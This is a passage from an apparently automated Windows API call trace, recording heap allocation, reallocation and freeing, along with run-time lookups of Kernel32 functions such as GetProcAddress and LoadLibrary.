0x6170e0 [0186.426] GetProcessHeap () returned 0x560000 [0186.426] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x6170b0, Size=0xa6) returned 0x60e5d0 [0186.426] GetProcessHeap () returned 0x560000 [0186.426] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xf) returned 0x617110 [0186.426] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0186.426] GetProcessHeap () returned 0x560000 [0186.426] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617110 | out: hHeap=0x560000) returned 1 [0186.426] GetProcessHeap () returned 0x560000 [0186.426] GetProcessHeap () returned 0x560000 [0186.426] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617120 [0186.426] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0186.426] GetProcessHeap () returned 0x560000 [0186.426] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617120 | out: hHeap=0x560000) returned 1 [0186.426] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x6170e0, Size=0x9) returned 0x617080 [0186.426] GetProcessHeap () returned 0x560000 [0186.426] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xf) returned 0x617240 [0186.426] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0186.427] GetProcessHeap () returned 0x560000 [0186.427] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617240 | out: hHeap=0x560000) returned 1 [0186.427] GetProcessHeap () returned 0x560000 [0186.427] GetProcessHeap () returned 0x560000 [0186.427] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x6171f0 [0186.427] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0186.427] GetProcessHeap () returned 0x560000 [0186.427] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171f0 | out: hHeap=0x560000) returned 1 [0186.427] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x617080, Size=0x11) returned 0x615340 [0186.427] GetProcessHeap () returned 0x560000 [0186.427] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xf) returned 0x617260 [0186.427] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0186.427] GetProcessHeap () returned 0x560000 [0186.427] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617260 | out: hHeap=0x560000) returned 1 [0186.427] GetProcessHeap () returned 0x560000 [0186.427] GetProcessHeap () returned 0x560000 [0186.427] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617110 [0186.427] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0186.427] GetProcessHeap () returned 0x560000 [0186.427] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617110 | out: hHeap=0x560000) returned 1 [0186.427] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x615340, Size=0x21) returned 0x613560 [0186.427] GetProcessHeap () returned 0x560000 [0186.427] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xf) returned 0x617140 [0186.427] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0186.427] GetProcessHeap () returned 0x560000 [0186.427] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617140 | out: hHeap=0x560000) returned 1 [0186.427] GetProcessHeap () returned 0x560000 [0186.427] GetProcessHeap () returned 0x560000 [0186.427] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617220 [0186.428] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0186.428] GetProcessHeap () returned 0x560000 [0186.428] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617220 | out: hHeap=0x560000) returned 1 [0186.428] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x613560, Size=0x41) returned 0x614aa0 [0186.428] GetProcessHeap () returned 0x560000 [0186.428] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xf) returned 0x617160 [0186.428] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0186.428] GetProcessHeap () returned 0x560000 [0186.428] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617160 | out: hHeap=0x560000) returned 1 [0186.428] GetProcessHeap () returned 0x560000 [0186.428] GetProcessHeap () returned 0x560000 [0186.428] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617110 [0186.428] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0186.428] GetProcessHeap () returned 0x560000 [0186.428] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617110 | out: hHeap=0x560000) returned 1 [0186.428] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x614aa0, Size=0x81) returned 0x60e690 [0186.428] GetProcessHeap () returned 0x560000 [0186.428] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xf) returned 0x617260 [0186.428] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0186.428] GetProcessHeap () returned 0x560000 [0186.428] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617260 | out: hHeap=0x560000) returned 1 [0186.428] GetProcessHeap () returned 0x560000 [0186.428] GetProcessHeap () returned 0x560000 [0186.428] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617120 [0186.429] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0186.429] GetProcessHeap () returned 0x560000 [0186.429] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617120 | out: hHeap=0x560000) returned 1 [0186.429] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x60e690, Size=0x51) returned 0x619950 [0186.429] GetProcessHeap () returned 0x560000 [0186.429] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617250 | out: hHeap=0x560000) returned 1 [0186.429] GetProcessHeap () returned 0x560000 [0186.429] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x6170f0, Size=0xa6) returned 0x60e690 [0186.429] GetProcessHeap () returned 0x560000 [0186.429] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x617100, Size=0x51) returned 0x6197d0 [0186.429] GetProcessHeap () returned 0x560000 [0186.429] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x619950 | out: hHeap=0x560000) returned 1 [0186.429] GetProcessHeap () returned 0x560000 [0186.429] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x60e5d0 | out: hHeap=0x560000) returned 1 [0186.429] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x30) returned 0x6133e0 [0186.429] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x70) returned 0x60e5d0 [0186.429] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xa0) returned 0x60e750 [0186.429] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6133e0 | out: hHeap=0x560000) returned 1 [0186.429] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x60e5d0 | out: hHeap=0x560000) returned 1 [0186.429] GetProcessHeap () returned 0x560000 [0186.429] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1) returned 0x617240 [0186.429] lstrlenA (lpString="") returned 0 [0186.429] GetProcessHeap () returned 0x560000 [0186.429] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1) returned 0x6171b0 [0186.429] lstrcpyA (in: lpString1=0x6171b0, lpString2="" | out: lpString1="") returned="" [0186.429] GetProcessHeap () returned 0x560000 [0186.429] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1) returned 0x617090 [0186.429] GetModuleHandleA (lpModuleName="Kernel32.dll") returned 0x7ffb26230000 [0186.430] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0186.430] GetProcAddress (hModule=0x7ffb26230000, lpProcName="LoadLibraryW") returned 0x7ffb262550f0 [0186.438] GetProcAddress (hModule=0x7ffb26230000, lpProcName="LoadLibraryA") returned 0x7ffb262574d0 [0186.438] GetProcAddress (hModule=0x7ffb26230000, lpProcName="FreeLibrary") returned 0x7ffb26254810 [0186.438] lstrlenA (lpString="") returned 0 [0186.438] GetProcessHeap () returned 0x560000 [0186.438] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1) returned 0x617220 [0186.438] lstrcpyA (in: lpString1=0x617220, lpString2="" | out: lpString1="") returned="" [0186.438] GetProcessHeap () returned 0x560000 [0186.438] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x50) returned 0x614fa0 [0186.438] GetProcessHeap () returned 0x560000 [0186.438] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2f) returned 0x613440 [0186.438] GetProcessHeap () returned 0x560000 [0186.438] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x45) returned 0x614c80 [0186.438] GetProcessHeap () returned 0x560000 [0186.438] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x31) returned 0x616dd0 [0186.438] GetProcessHeap () returned 0x560000 [0186.438] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x48) returned 0x614eb0 [0186.438] GetProcessHeap () returned 0x560000 [0186.438] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x3) returned 0x6170d0 [0186.438] GetProcessHeap () returned 0x560000 [0186.438] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x4) returned 0x617080 [0186.438] GetProcessHeap () returned 0x560000 [0186.438] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x6) returned 0x617170 [0186.438] GetProcessHeap () returned 0x560000 [0186.438] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x8) returned 0x617120 [0186.439] GetProcessHeap () returned 0x560000 [0186.439] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xa) returned 0x617130 [0186.439] GetProcessHeap () returned 0x560000 [0186.439] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x10) returned 0x6170a0 [0186.439] GetProcessHeap () returned 0x560000 [0186.439] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xd) returned 0x6170f0 [0186.439] GetProcessHeap () returned 0x560000 [0186.439] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xa) returned 0x6170e0 [0186.439] GetProcessHeap () returned 0x560000 [0186.439] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2a) returned 0x613470 [0186.439] GetProcessHeap () returned 0x560000 [0186.439] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1c) returned 0x615340 [0186.439] GetProcessHeap () returned 0x560000 [0186.439] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5a) returned 0x6190b0 [0186.439] GetProcessHeap () returned 0x560000 [0186.439] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x4f) returned 0x614cd0 [0186.439] GetProcessHeap () returned 0x560000 [0186.439] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x8) returned 0x617100 [0186.439] GetProcessHeap () returned 0x560000 [0186.439] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1f) returned 0x615bc0 [0186.439] GetProcessHeap () returned 0x560000 [0186.439] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x28) returned 0x613110 [0186.439] GetProcessHeap () returned 0x560000 [0186.439] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x22) returned 0x6133e0 [0186.439] GetProcessHeap () returned 0x560000 [0186.439] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x6) returned 0x6170b0 [0186.439] GetProcessHeap () returned 0x560000 [0186.439] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1e) returned 0x615b80 [0186.439] GetProcessHeap () returned 0x560000 [0186.439] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x26) returned 0x613620 [0186.439] GetProcessHeap () returned 0x560000 [0186.439] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x3) returned 0x6170c0 [0186.439] GetProcessHeap () returned 0x560000 [0186.439] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x4d) returned 0x614a50 [0186.439] GetProcessHeap () returned 0x560000 [0186.439] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x31) returned 0x616a90 [0186.439] GetProcessHeap () returned 0x560000 [0186.439] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x6) returned 0x617180 [0186.439] GetProcessHeap () returned 0x560000 [0186.439] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617150 [0186.439] GetProcessHeap () returned 0x560000 [0186.439] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x32) returned 0x616ad0 [0186.440] GetProcessHeap () returned 0x560000 [0186.440] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x6) returned 0x617110 [0186.440] GetProcessHeap () returned 0x560000 [0186.440] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xa) returned 0x617140 [0186.440] GetProcessHeap () returned 0x560000 [0186.440] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x6) returned 0x617250 [0186.440] GetProcessHeap () returned 0x560000 [0186.440] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5b) returned 0x619170 [0186.440] GetProcessHeap () returned 0x560000 [0186.440] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x4c) returned 0x614aa0 [0186.440] GetProcessHeap () returned 0x560000 [0186.440] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x6) returned 0x6171f0 [0186.440] GetProcessHeap () returned 0x560000 [0186.440] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x8) returned 0x617260 [0186.440] GetProcessHeap () returned 0x560000 [0186.440] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x6) returned 0x6171c0 [0186.440] GetProcessHeap () returned 0x560000 [0186.440] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x19) returned 0x615c40 [0186.440] GetProcessHeap () returned 0x560000 [0186.440] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1b) returned 0x615ba0 [0186.440] GetProcessHeap () returned 0x560000 [0186.440] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x18) returned 0x615a00 [0186.440] GetProcessHeap () returned 0x560000 [0186.440] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x25) returned 0x613410 [0186.440] GetProcessHeap () returned 0x560000 [0186.440] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xb) returned 0x617270 [0186.440] GetProcessHeap () returned 0x560000 [0186.440] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x4) returned 0x6171a0 [0186.440] GetProcessHeap () returned 0x560000 [0186.440] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x17) returned 0x615ac0 [0186.440] GetProcessHeap () returned 0x560000 [0186.440] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x3) returned 0x6171d0 [0186.440] GetProcessHeap () returned 0x560000 [0186.440] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x4) returned 0x617160 [0186.440] GetProcessHeap () returned 0x560000 [0186.440] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x8) returned 0x617190 [0186.440] GetProcessHeap () returned 0x560000 [0186.440] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xa) returned 0x6171e0 [0186.440] GetProcessHeap () returned 0x560000 [0186.440] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x6) returned 0x617200 [0186.440] GetProcessHeap () returned 0x560000 [0186.440] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617210 [0186.440] GetProcessHeap () returned 0x560000 [0186.441] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x12) returned 0x615940 [0186.441] GetProcessHeap () returned 0x560000 [0186.441] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x18) returned 0x615c20 [0186.441] GetProcessHeap () returned 0x560000 [0186.441] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x8) returned 0x617470 [0186.441] GetProcessHeap () returned 0x560000 [0186.441] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xa) returned 0x6173a0 [0186.441] GetProcessHeap () returned 0x560000 [0186.441] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x24) returned 0x613080 [0186.441] GetProcessHeap () returned 0x560000 [0186.441] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617380 [0186.441] GetProcessHeap () returned 0x560000 [0186.441] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x3a) returned 0x616d50 [0186.441] GetProcessHeap () returned 0x560000 [0186.441] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617350 [0186.441] GetProcessHeap () returned 0x560000 [0186.441] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x36) returned 0x616e90 [0186.441] GetProcessHeap () returned 0x560000 [0186.441] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x39) returned 0x616c90 [0186.441] GetProcessHeap () returned 0x560000 [0186.441] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x6172e0 [0186.441] GetProcessHeap () returned 0x560000 [0186.441] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x13) returned 0x615be0 [0186.441] GetProcessHeap () returned 0x560000 [0186.441] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x3b) returned 0x616bd0 [0186.441] GetProcessHeap () returned 0x560000 [0186.441] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x55) returned 0x619b30 [0186.441] GetProcessHeap () returned 0x560000 [0186.441] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x25) returned 0x6134d0 [0186.441] GetProcessHeap () returned 0x560000 [0186.441] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xa) returned 0x6173d0 [0186.441] GetProcessHeap () returned 0x560000 [0186.441] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x35) returned 0x616b10 [0186.441] GetProcessHeap () returned 0x560000 [0186.441] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1c) returned 0x615900 [0186.441] GetProcessHeap () returned 0x560000 [0186.441] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x8) returned 0x6173f0 [0186.441] GetProcessHeap () returned 0x560000 [0186.441] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x20) returned 0x615980 [0186.442] GetProcessHeap () returned 0x560000 [0186.442] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x45) returned 0x61d320 [0186.442] GetProcessHeap () returned 0x560000 [0186.442] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x19) returned 0x6159c0 [0186.442] GetProcessHeap () returned 0x560000 [0186.442] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x3c) returned 0x616b50 [0186.442] GetProcessHeap () returned 0x560000 [0186.442] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x12) returned 0x615c00 [0186.442] GetProcessHeap () returned 0x560000 [0186.442] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x35) returned 0x616b90 [0186.442] GetProcessHeap () returned 0x560000 [0186.442] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x6) returned 0x617360 [0186.442] GetProcessHeap () returned 0x560000 [0186.442] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x8) returned 0x6173b0 [0186.442] GetProcessHeap () returned 0x560000 [0186.442] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x43) returned 0x61d7d0 [0186.442] GetProcessHeap () returned 0x560000 [0186.442] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x33) returned 0x616990 [0186.442] GetProcessHeap () returned 0x560000 [0186.442] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x4) returned 0x617280 [0186.442] GetProcessHeap () returned 0x560000 [0186.442] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x17) returned 0x6159a0 [0186.442] GetProcessHeap () returned 0x560000 [0186.442] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x3) returned 0x6173e0 [0186.442] GetProcessHeap () returned 0x560000 [0186.442] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x33) returned 0x616cd0 [0186.442] lstrlenA (lpString="") returned 0 [0186.442] GetProcessHeap () returned 0x560000 [0186.442] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1) returned 0x617290 [0186.442] lstrcpyA (in: lpString1=0x617290, lpString2="" | out: lpString1="") returned="" [0186.442] GetProcessHeap () returned 0x560000 [0186.442] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1) returned 0x617410 [0186.442] GetProcessHeap () returned 0x560000 [0186.442] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x617410, Size=0x65) returned 0x60e5d0 [0186.442] GetProcessHeap () returned 0x560000 [0186.442] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617290 | out: hHeap=0x560000) returned 1 [0186.442] GetProcessHeap () returned 0x560000 [0186.442] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x33) returned 0x616ed0 [0186.442] GetProcessHeap () returned 0x560000 [0186.442] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x616ed0, Size=0x69) returned 0x60e800 [0186.442] GetProcessHeap () returned 0x560000 [0186.443] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x35) returned 0x616890 [0186.443] GetProcessHeap () returned 0x560000 [0186.443] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x616890, Size=0x95) returned 0x60e880 [0186.443] GetProcessHeap () returned 0x560000 [0186.443] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x4b) returned 0x61d050 [0186.443] GetProcessHeap () returned 0x560000 [0186.443] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x61d050, Size=0x9b) returned 0x60e930 [0186.443] GetProcessHeap () returned 0x560000 [0186.443] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x4e) returned 0x61d2d0 [0186.443] GetProcessHeap () returned 0x560000 [0186.443] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x61d2d0, Size=0xff) returned 0x61b040 [0186.443] GetProcessHeap () returned 0x560000 [0186.443] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x80) returned 0x60e9e0 [0186.443] GetProcessHeap () returned 0x560000 [0186.443] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x60e9e0, Size=0x183) returned 0x60ea70 [0186.443] GetProcessHeap () returned 0x560000 [0186.443] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc2) returned 0x60ec10 [0186.443] GetProcessHeap () returned 0x560000 [0186.443] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x60ec10, Size=0x191) returned 0x60ecf0 [0186.443] GetProcessHeap () returned 0x560000 [0186.443] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc9) returned 0x60ec10 [0186.443] GetProcessHeap () returned 0x560000 [0186.443] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x60ec10, Size=0x19b) returned 0x60eea0 [0186.443] GetProcessHeap () returned 0x560000 [0186.443] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xce) returned 0x60ec10 [0186.443] GetProcessHeap () returned 0x560000 [0186.443] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x60ec10, Size=0x203) returned 0x60f050 [0186.443] GetProcessHeap () returned 0x560000 [0186.443] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x102) returned 0x60f270 [0186.443] GetProcessHeap () returned 0x560000 [0186.443] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x60f270, Size=0x225) returned 0x60f390 [0186.443] GetProcessHeap () returned 0x560000 [0186.443] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x113) returned 0x61eee0 [0186.443] GetProcessHeap () returned 0x560000 [0186.443] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x61eee0, Size=0x29b) returned 0x610530 [0186.443] GetProcessHeap () returned 0x560000 [0186.443] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x14e) returned 0x60f5d0 [0186.443] GetProcessHeap () returned 0x560000 [0186.443] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x60f5d0, Size=0x2cb) returned 0x6107e0 [0186.443] GetProcessHeap () returned 0x560000 [0186.443] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x166) returned 0x60f5d0 [0186.443] GetProcessHeap () returned 0x560000 [0186.443] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x60f5d0, Size=0x353) returned 0x610ac0 [0186.443] GetProcessHeap () returned 0x560000 [0186.444] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1aa) returned 0x60f5d0 [0186.444] GetProcessHeap () returned 0x560000 [0186.444] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x60f5d0, Size=0x391) returned 0x610e30 [0186.444] GetProcessHeap () returned 0x560000 [0186.444] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1c9) returned 0x60f5d0 [0186.444] GetProcessHeap () returned 0x560000 [0186.444] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x60f5d0, Size=0x39f) returned 0x6111e0 [0186.444] GetProcessHeap () returned 0x560000 [0186.444] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1d0) returned 0x60f5d0 [0186.444] GetProcessHeap () returned 0x560000 [0186.444] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x60f5d0, Size=0x3d5) returned 0x611590 [0186.444] GetProcessHeap () returned 0x560000 [0186.444] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1eb) returned 0x60f5d0 [0186.444] GetProcessHeap () returned 0x560000 [0186.444] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x60f5d0, Size=0x43d) returned 0x611980 [0186.444] GetProcessHeap () returned 0x560000 [0186.444] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x21f) returned 0x611dd0 [0186.444] GetProcessHeap () returned 0x560000 [0186.444] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x611dd0, Size=0x44f) returned 0x620040 [0186.444] GetProcessHeap () returned 0x560000 [0186.444] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x228) returned 0x611dd0 [0186.444] GetProcessHeap () returned 0x560000 [0186.444] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x611dd0, Size=0x497) returned 0x6204a0 [0186.444] GetProcessHeap () returned 0x560000 [0186.444] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x24c) returned 0x60f5d0 [0186.444] GetProcessHeap () returned 0x560000 [0186.444] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x60f5d0, Size=0x53f) returned 0x620950 [0186.444] GetProcessHeap () returned 0x560000 [0186.444] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2a0) returned 0x620ea0 [0186.445] GetProcessHeap () returned 0x560000 [0186.445] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x620ea0, Size=0x5b3) returned 0x621150 [0186.445] GetProcessHeap () returned 0x560000 [0186.445] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2da) returned 0x621720 [0186.445] GetProcessHeap () returned 0x560000 [0186.445] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x621720, Size=0x5d7) returned 0x621a10 [0186.445] GetProcessHeap () returned 0x560000 [0186.445] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2ec) returned 0x622000 [0186.445] 